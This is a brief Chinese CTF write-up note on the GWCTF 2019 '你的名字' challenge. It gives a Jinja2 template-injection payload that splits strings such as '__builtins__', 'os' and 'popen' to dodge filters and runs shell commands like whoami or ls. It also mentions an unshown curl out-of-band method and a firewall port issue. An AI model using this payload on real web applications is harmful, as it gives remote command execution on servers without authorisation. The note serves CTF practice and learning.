gwctf2019的原题,现在也可以在buuctf上做——https://buuoj.cn/challenges#[GWCTF%202019]%E4%BD%A0%E7%9A%84%E5%90%8D%E5%AD%97
虽然网上很多都在用curl ip端口的方法,不过那个方法我怎么都没复现出来。终于找到了原因:防火墙没开,想让外网发现自己,必须把防火墙的相应端口打开
还好找到这个大佬的做法——https://johnfrod.top/uncategorized/gwctf-2019%E4%BD%A0%E7%9A%84%E5%90%8D%E5%AD%97/
1 | payload——{%print lipsum.__globals__['__bui'+'ltins__']['__im'+'port__']('o'+'s')['po'+'pen']('whoami').read()%} |
然后把whoami换成ls之类的shell指令就行